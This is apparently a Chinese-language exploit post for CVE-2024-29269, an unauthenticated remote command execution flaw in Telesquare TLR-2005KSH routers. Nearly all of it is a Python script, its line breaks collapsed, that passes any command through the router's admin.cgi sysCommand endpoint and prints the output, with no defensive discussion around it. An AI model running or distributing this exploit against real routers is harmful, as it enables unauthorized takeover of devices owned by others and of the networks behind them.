CVE-2024-29269｜Telesquare TLR-2005KSH路由器未授权远程命令执行漏洞（EXP）

import sysimport requestsimport xml.etree.ElementTree as ETdef get_systemutil_response(url, command, proxy):    endpoint = f"/cgi-bin/admin.cgi?Command=sysCommand&Cmd={command}"    full_url = url.rstrip('/') + endpoint    headers = {        'Referer': url,    }    try:        response = requests.get(full_url, headers=headers, proxies=proxy)        if response.status_code == 200:            print("Response from", full_url)            #print(response.text)            root = ET.fromstring(response.text)            for cmd_result in root.findall('CmdResult'):                data = cmd_result.text.strip()                print(data)        else:            print("Error: Failed to fetch data. Status code:", response.status_code)    except requests.exceptions.RequestException as e:        print("Error:", e)if __name__ == "__main__":    if len(sys.argv) != 3:        print("Usage: python script.py <url> <command>")        sys.exit(1)    url = sys.argv[1]    command = sys.argv[2]    proxy = {        'http': 'http://127.0.0.1:8080',        'https': 'https://127.0.0.1:8080',    }    get_systemutil_response(url, command, proxy)